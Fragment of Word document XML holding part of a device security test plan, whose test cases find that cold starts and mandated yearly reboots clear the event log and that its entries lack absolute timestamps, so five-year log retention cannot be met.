                <w:bCs w:val="0"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="006D5B99">
              <w:rPr>
                <w:b w:val="0"/>
                <w:bCs w:val="0"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>Tools</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="7737" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="69C2E85E" w14:textId="417BBD50"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D62662" w:rsidRPr="006D5B99"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62662" w:rsidRPr="006D5B99" w:rsidRDefault="00D62662" w:rsidP="00D62662">
            <w:pPr>
              <w:pStyle w:val="KeinLeerraum"/>
              <w:rPr>
                <w:b w:val="0"/>
                <w:bCs w:val="0"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="006D5B99">
              <w:rPr>
                <w:b w:val="0"/>
                <w:bCs w:val="0"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>Procedure</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="7737" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="3741411D" w14:textId="431A8632" w:rsidR="00D62662" w:rsidRPr="006D5B99" w:rsidRDefault="00D62662" w:rsidP="00D626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(log is cleared by a cold start) and record it under RQ-012; optionally use the near-full circular buffer produced in TC-RQ012-01 as the starting point before the cold start, to show that even a full buffer is completely cleared.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00D62662" w:rsidRPr="006D5B99"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30A5FA0A" w:rsidR="00D62662" w:rsidRPr="006D5B99" w:rsidRDefault="00D62662" w:rsidP="00D62662">
            <w:pPr>
              <w:pStyle w:val="KeinLeerraum"/>
              <w:rPr>
                <w:b w:val="0"/>
                <w:bCs w:val="0"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="006D5B99">
              <w:rPr>
                <w:b w:val="0"/>
                <w:bCs w:val="0"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>Result</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="7737" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="5AFC077C" w14:textId="2756B4E1" w:rsidR="00D62662" w:rsidRPr="006D5B99" w:rsidRDefault="00D62662" w:rsidP="00D6266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 </w:t>
            </w:r>
            <w:r w:rsidR="00CA0401" w:rsidRPr="006D5B99">
              <w:rPr>
                <w:color w:val="EE0000"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t xml:space="preserve"> -</w:t>
            </w:r>
            <w:r w:rsidRPr="006D5B99">
              <w:rPr>
                <w:color w:val="EE0000"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t xml:space="preserve"> log completely cleared after a cold start (confirms G-1).</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="3320C5FE" w14:textId="77777777" w:rsidR="00D90BE6" w:rsidRPr="006D5B99" w:rsidRDefault="00D90BE6" w:rsidP="00D90BE6">
      <w:pPr>
        <w:pStyle w:val="KeinLeerraum"/>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="510F75BA" w14:textId="0DA09DBF" w:rsidR="00516341" w:rsidRPr="006D5B99" w:rsidRDefault="00516341" w:rsidP="00516341">
      <w:pPr>
        <w:pStyle w:val="KeinLeerraum"/>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="006D5B99">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">TC-RQ012-03 -  </w:t>
      </w:r>
      <w:r w:rsidR="008806B5" w:rsidRPr="006D5B99">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Mandated-Reboot Retention Impossibility</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="59244353" w14:textId="77777777" w:rsidR="00516341" w:rsidRPr="006D5B99" w:rsidRDefault="00516341" w:rsidP="0051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7678274D"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02B51E07" w14:textId="52E5B88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2.9 </w:t>
            </w:r>
            <w:r w:rsidRPr="006D5B99">
              <w:rPr>
                <w:lang w:val="it-IT"/>
              </w:rPr>
              <w:sym w:font="Wingdings" w:char="F0E0"/>
            </w:r>
            <w:r w:rsidRPr="006D5B99">
              <w:rPr>
                <w:lang w:val="it-IT"/>
              </w:rPr>
              <w:t xml:space="preserve"> Asset I</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00516341" w:rsidRPr="006D5B99"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71B928F9" w14:textId="319B69B9" w:rsidR="00516341" w:rsidRPr="006D5B99"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6D5B99">
              <w:rPr>
                <w:lang w:val="fr-FR"/>
              </w:rPr>
              <w:t>N/A, lifecycle/documentation analysis</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00516341" w:rsidRPr="006D5B99"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2715675A" w14:textId="38AB8EB4" w:rsidR="00516341" w:rsidRPr="006D5B99"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16341" w:rsidRPr="006D5B99"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A88EEA7" w14:textId="0AAD474C" w:rsidR="00516341" w:rsidRPr="006D5B99"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6D5B99"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7039F20F" w14:textId="77777777"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Identify the mandated maximum reboot interval from documentation.</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="7A081006" w14:textId="3D1B27B2" w:rsidR="00201E67"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Show that each mandated reboot is a cold start that clears the log (per TC-</w:t>
            </w:r>
            <w:r w:rsidR="00783944" w:rsidRPr="006D5B99">
              <w:rPr>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>RQ</w:t>
            </w:r>
            <w:r w:rsidRPr="006D5B99">
              <w:rPr>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>012-</w:t>
            </w:r>
            <w:r w:rsidR="00783944" w:rsidRPr="006D5B99">
              <w:rPr>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>02</w:t>
            </w:r>
            <w:r w:rsidRPr="006D5B99">
              <w:rPr>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>).</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="07BD8A82" w14:textId="225BA9A5" w:rsidR="00516341" w:rsidRPr="006D5B99"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Conclude that the retention window cannot be sustained on-device.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00516341" w:rsidRPr="006D5B99"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43351539" w14:textId="77777777" w:rsidR="00201E67"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Structural finding. </w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="5AC030B8" w14:textId="60D4DFC2" w:rsidR="00516341" w:rsidRPr="006D5B99"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mandated reboot guarantees periodic log erasure within the retention period </w:t>
            </w:r>
            <w:r w:rsidR="007F04F8" w:rsidRPr="006D5B99">
              <w:rPr>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t xml:space="preserve"> --&gt;</w:t>
            </w:r>
            <w:r w:rsidRPr="006D5B99">
              <w:rPr>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t xml:space="preserve"> five-year on-device retention structurally impossible.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="6E114D49" w14:textId="77777777" w:rsidR="00516341" w:rsidRPr="006D5B99" w:rsidRDefault="00516341" w:rsidP="00516341">
      <w:pPr>
        <w:pStyle w:val="KeinLeerraum"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="28CEDEDC"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2B0269B9"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8A1FA93" w14:textId="3705082B"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TC-RQ012-03</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="004B13BB" w:rsidRPr="006D5B99"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4B13BB" w:rsidRPr="006D5B99" w:rsidRDefault="004B13BB" w:rsidP="004B13BB">
            <w:pPr>
              <w:pStyle w:val="KeinLeerraum"/>
              <w:rPr>
                <w:b w:val="0"/>
                <w:bCs w:val="0"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="006D5B99">
              <w:rPr>
                <w:b w:val="0"/>
                <w:bCs w:val="0"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>HW/Network</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="7737" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="0EB7DBF2" w14:textId="1CD8A12F"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analytical</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="004B13BB" w:rsidRPr="006D5B99"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4B13BB" w:rsidRPr="006D5B99" w:rsidRDefault="004B13BB" w:rsidP="004B13BB">
            <w:pPr>
              <w:pStyle w:val="KeinLeerraum"/>
              <w:rPr>
                <w:b w:val="0"/>
                <w:bCs w:val="0"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="006D5B99">
              <w:rPr>
                <w:b w:val="0"/>
                <w:bCs w:val="0"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>Tools</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="7737" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="0FF33ADC" w14:textId="13B77EEC"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None </w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="004B13BB" w:rsidRPr="006D5B99"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4B13BB" w:rsidRPr="006D5B99" w:rsidRDefault="004B13BB" w:rsidP="004B13BB">
            <w:pPr>
              <w:pStyle w:val="KeinLeerraum"/>
              <w:rPr>
                <w:b w:val="0"/>
                <w:bCs w:val="0"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="006D5B99">
              <w:rPr>
                <w:b w:val="0"/>
                <w:bCs w:val="0"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>Procedure</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="7737" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="3845FCB2"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Reference SRIO-1812 (max. 1-year reboot interval, required to test</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="6FFC12D6"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watchdog/safety functions that cannot be tested at runtime).</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="346B9FEB"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Link this to the empirical finding from TC-RQ012-02 (cold start clears</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="1FE2BDBC" w14:textId="77777777" w:rsidR="004B13BB" w:rsidRPr="006D5B99" w:rsidRDefault="004B13BB" w:rsidP="004B13BB">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the log).</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="4D2D08F8" w14:textId="58959416" w:rsidR="004B13BB" w:rsidRPr="006D5B99" w:rsidRDefault="004B13BB" w:rsidP="004B13B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3. Draw the conclusion.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="004B13BB" w:rsidRPr="006D5B99"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010F3707" w:rsidR="004B13BB" w:rsidRPr="006D5B99" w:rsidRDefault="004B13BB" w:rsidP="004B13BB">
            <w:pPr>
              <w:pStyle w:val="KeinLeerraum"/>
              <w:rPr>
                <w:b w:val="0"/>
                <w:bCs w:val="0"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="006D5B99">
              <w:rPr>
                <w:b w:val="0"/>
                <w:bCs w:val="0"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>Result</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="7737" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="55A66456" w14:textId="7D5EF212" w:rsidR="004B13BB" w:rsidRPr="006D5B99" w:rsidRDefault="004B13BB" w:rsidP="004B13B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structural impossibility of 5-year on-device retention, since a cold start is guaranteed to clear the log at least once per year due to the device's own mandated maintenance reboot.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="5F3E0310" w14:textId="77777777" w:rsidR="00530E8C" w:rsidRPr="006D5B99" w:rsidRDefault="00530E8C" w:rsidP="009C0A46">
      <w:pPr>
        <w:pStyle w:val="KeinLeerraum"/>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="6D06A630" w14:textId="558DF0C7" w:rsidR="00201E67" w:rsidRPr="006D5B99" w:rsidRDefault="00516341" w:rsidP="00201E67">
      <w:pPr>
        <w:pStyle w:val="KeinLeerraum"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="006D5B99">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">TC-RQ012-04 -  </w:t>
      </w:r>
      <w:r w:rsidR="00201E67" w:rsidRPr="006D5B99">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">Time-Attribution of Retained Entries </w:t>
      </w:r>
      <w:r w:rsidR="00201E67" w:rsidRPr="006D5B99">
        <w:rPr>
          <w:rFonts w:ascii="Cambria Math" w:hAnsi="Cambria Math" w:cs="Cambria Math"/>
          <w:b/>
          <w:bCs/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>⇄</w:t>
      </w:r>
      <w:r w:rsidR="00201E67" w:rsidRPr="006D5B99">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> TC-</w:t>
      </w:r>
      <w:r w:rsidR="00775452" w:rsidRPr="006D5B99">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>RQ</w:t>
      </w:r>
      <w:r w:rsidR="00201E67" w:rsidRPr="006D5B99">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>003-</w:t>
      </w:r>
      <w:r w:rsidR="00775452" w:rsidRPr="006D5B99">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>04</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4E8EFD20" w14:textId="3B59545F" w:rsidR="00516341" w:rsidRPr="006D5B99" w:rsidRDefault="00516341" w:rsidP="00201E67">
      <w:pPr>
        <w:pStyle w:val="KeinLeerraum"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="006D5B99">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6D5B99"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6D5B99" w:rsidRDefault="00516341" w:rsidP="00FC20AC">
            <w:pPr>
              <w:pStyle w:val="KeinLeerraum"/>
              <w:rPr>
                <w:b w:val="0"/>
                <w:bCs w:val="0"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="006D5B99">
              <w:rPr>
                <w:b w:val="0"/>
                <w:bCs w:val="0"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>Field</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="7762" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="1315C5C2"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6D5B99" w:rsidRDefault="00516341" w:rsidP="00FC20AC">
            <w:pPr>
              <w:pStyle w:val="KeinLeerraum"/>
              <w:rPr>
                <w:b w:val="0"/>
                <w:bCs w:val="0"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="006D5B99">
              <w:rPr>
                <w:b w:val="0"/>
                <w:bCs w:val="0"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>Traceability</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="7762" w:type="dxa"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="3A5215E7" w14:textId="22CAE5F0"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RQ-012 </w:t>
            </w:r>
            <w:r w:rsidRPr="006D5B99">
              <w:rPr>
                <w:lang w:val="it-IT"/>
              </w:rPr>
              <w:sym w:font="Wingdings" w:char="F0E0"/>
            </w:r>
            <w:r w:rsidRPr="006D5B99">
              <w:rPr>
                <w:lang w:val="it-IT"/>
              </w:rPr>
              <w:t xml:space="preserve"> CR 2.11 </w:t>
            </w:r>
            <w:r w:rsidRPr="006D5B99">
              <w:rPr>
                <w:lang w:val="it-IT"/>
              </w:rPr>
              <w:sym w:font="Wingdings" w:char="F0E0"/>
            </w:r>
            <w:r w:rsidRPr="006D5B99">
              <w:rPr>
                <w:lang w:val="it-IT"/>
              </w:rPr>
              <w:t xml:space="preserve"> Asset I</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00516341" w:rsidRPr="006D5B99"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6D5B99" w:rsidRDefault="00516341" w:rsidP="00FC20AC">
            <w:pPr>
              <w:pStyle w:val="KeinLeerraum"/>
              <w:rPr>
                <w:b w:val="0"/>
                <w:bCs w:val="0"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="006D5B99">
              <w:rPr>
                <w:b w:val="0"/>
                <w:bCs w:val="0"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>Target Threat</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="7762" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="4D4D7F67" w14:textId="0F60E608" w:rsidR="00516341" w:rsidRPr="006D5B99"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16341" w:rsidRPr="006D5B99"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6D5B99" w:rsidRDefault="00516341" w:rsidP="00FC20AC">
            <w:pPr>
              <w:pStyle w:val="KeinLeerraum"/>
              <w:rPr>
                <w:b w:val="0"/>
                <w:bCs w:val="0"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="006D5B99">
              <w:rPr>
                <w:b w:val="0"/>
                <w:bCs w:val="0"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>SVV Category</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="7762" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="6120EABE" w14:textId="1FBA0203" w:rsidR="00516341" w:rsidRPr="006D5B99"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516341" w:rsidRPr="006D5B99"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6D5B99" w:rsidRDefault="00516341" w:rsidP="00FC20AC">
            <w:pPr>
              <w:pStyle w:val="KeinLeerraum"/>
              <w:rPr>
                <w:b w:val="0"/>
                <w:bCs w:val="0"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="006D5B99">
              <w:rPr>
                <w:b w:val="0"/>
                <w:bCs w:val="0"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>Objective</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="7762" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="044F6E99" w14:textId="77AD8117" w:rsidR="00516341" w:rsidRPr="006D5B99"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By reference to TC-</w:t>
            </w:r>
            <w:r w:rsidR="00775452" w:rsidRPr="006D5B99">
              <w:rPr>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>RQ</w:t>
            </w:r>
            <w:r w:rsidRPr="006D5B99">
              <w:rPr>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>003-</w:t>
            </w:r>
            <w:r w:rsidR="00775452" w:rsidRPr="006D5B99">
              <w:rPr>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>04</w:t>
            </w:r>
            <w:r w:rsidRPr="006D5B99">
              <w:rPr>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>, confirm that no retained entry carries an absolute timestamp, so even surviving entries cannot be bounded to a five-year window.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00516341" w:rsidRPr="006D5B99"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6D5B99" w:rsidRDefault="00516341" w:rsidP="00FC20AC">
            <w:pPr>
              <w:pStyle w:val="KeinLeerraum"/>
              <w:rPr>
                <w:b w:val="0"/>
                <w:bCs w:val="0"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="006D5B99">
              <w:rPr>
                <w:b w:val="0"/>
                <w:bCs w:val="0"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>Steps</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="7762" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="6EDB399B" w14:textId="6DB33ECE" w:rsidR="00516341" w:rsidRPr="006D5B99"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Execute per TC-</w:t>
            </w:r>
            <w:r w:rsidR="00775452" w:rsidRPr="006D5B99">
              <w:rPr>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>RQ</w:t>
            </w:r>
            <w:r w:rsidRPr="006D5B99">
              <w:rPr>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>003-</w:t>
            </w:r>
            <w:r w:rsidR="00775452" w:rsidRPr="006D5B99">
              <w:rPr>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>04</w:t>
            </w:r>
            <w:r w:rsidRPr="006D5B99">
              <w:rPr>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>; record against RQ-012.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00516341" w:rsidRPr="006D5B99"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6D5B99" w:rsidRDefault="00516341" w:rsidP="00FC20AC">
            <w:pPr>
              <w:pStyle w:val="KeinLeerraum"/>
              <w:rPr>
                <w:b w:val="0"/>
                <w:bCs w:val="0"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="006D5B99">
              <w:rPr>
                <w:b w:val="0"/>
                <w:bCs w:val="0"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>Pass/Fail</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="7762" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="08F8F6C9" w14:textId="301D7619" w:rsidR="00516341" w:rsidRPr="006D5B99"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entries carry only a relative uptime reference, no absolute timestamp </w:t>
            </w:r>
            <w:r w:rsidR="00F57856" w:rsidRPr="006D5B99">
              <w:rPr>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:sym w:font="Wingdings" w:char="F0E0"/>
            </w:r>
            <w:r w:rsidRPr="006D5B99">
              <w:rPr>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t xml:space="preserve"> retained fragment is undatable (compounds the capacity gap).</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="36677B87" w14:textId="77777777" w:rsidR="00516341" w:rsidRPr="006D5B99" w:rsidRDefault="00516341" w:rsidP="00516341">
      <w:pPr>
        <w:pStyle w:val="KeinLeerraum"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="3AFAB892" w14:textId="77777777" w:rsidR="00516341" w:rsidRPr="006D5B99" w:rsidRDefault="00516341" w:rsidP="0051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6D5B99"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6D5B99" w:rsidRDefault="00516341" w:rsidP="00FC20AC">
            <w:pPr>
              <w:pStyle w:val="KeinLeerraum"/>
              <w:rPr>
                <w:b w:val="0"/>
                <w:bCs w:val="0"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="006D5B99">
              <w:rPr>
                <w:b w:val="0"/>
                <w:bCs w:val="0"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>Field</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="7737" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="4B6BBDD4" w14:textId="77777777" w:rsidR="00516341" w:rsidRPr="006D5B99"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16341" w:rsidRPr="006D5B99"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6D5B99" w:rsidRDefault="00516341" w:rsidP="00FC20AC">
            <w:pPr>
              <w:pStyle w:val="KeinLeerraum"/>
              <w:rPr>
                <w:b w:val="0"/>
                <w:bCs w:val="0"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="006D5B99">
              <w:rPr>
                <w:b w:val="0"/>
                <w:bCs w:val="0"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>Ref. Test Case</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="7737" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="70A7CE5B" w14:textId="1FC41A56" w:rsidR="00516341" w:rsidRPr="006D5B99"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TC-RQ012-04</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="001872E8" w:rsidRPr="006D5B99"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1872E8" w:rsidRPr="006D5B99" w:rsidRDefault="001872E8" w:rsidP="001872E8">
            <w:pPr>
              <w:pStyle w:val="KeinLeerraum"/>
              <w:rPr>
                <w:b w:val="0"/>
                <w:bCs w:val="0"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="006D5B99">
              <w:rPr>
                <w:b w:val="0"/>
                <w:bCs w:val="0"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>HW/Network</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="7737" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="33D2D9E7" w14:textId="636BA8BA" w:rsidR="001872E8" w:rsidRPr="006D5B99" w:rsidRDefault="00CE0BBA"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1872E8" w:rsidRPr="006D5B99">
              <w:rPr>
                <w:color w:val="EE0000"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t xml:space="preserve"> TC-RQ003-04 </w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="001872E8" w:rsidRPr="006D5B99"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1872E8" w:rsidRPr="006D5B99" w:rsidRDefault="001872E8" w:rsidP="001872E8">
            <w:pPr>
              <w:pStyle w:val="KeinLeerraum"/>
              <w:rPr>
                <w:b w:val="0"/>
                <w:bCs w:val="0"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="006D5B99">
              <w:rPr>
                <w:b w:val="0"/>
                <w:bCs w:val="0"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>Tools</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="7737" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="6D4C7AF0" w14:textId="7A716555"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See TC-RQ003-04.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="001872E8" w:rsidRPr="006D5B99"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1872E8" w:rsidRPr="006D5B99" w:rsidRDefault="001872E8" w:rsidP="001872E8">
            <w:pPr>
              <w:pStyle w:val="KeinLeerraum"/>
              <w:rPr>
                <w:b w:val="0"/>
                <w:bCs w:val="0"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="006D5B99">
              <w:rPr>
                <w:b w:val="0"/>
                <w:bCs w:val="0"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>Procedure</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="7737" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="6F7DDA13" w14:textId="6B4972A6" w:rsidR="001872E8" w:rsidRPr="006D5B99" w:rsidRDefault="001872E8" w:rsidP="001872E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Take the result from TC-RQ003-04 and record it under RQ-012 traceability.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="001872E8" w:rsidRPr="006D5B99"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0ED09981" w:rsidR="001872E8" w:rsidRPr="006D5B99" w:rsidRDefault="001872E8" w:rsidP="001872E8">
            <w:pPr>
              <w:pStyle w:val="KeinLeerraum"/>
              <w:rPr>
                <w:b w:val="0"/>
                <w:bCs w:val="0"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="006D5B99">
              <w:rPr>
                <w:b w:val="0"/>
                <w:bCs w:val="0"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
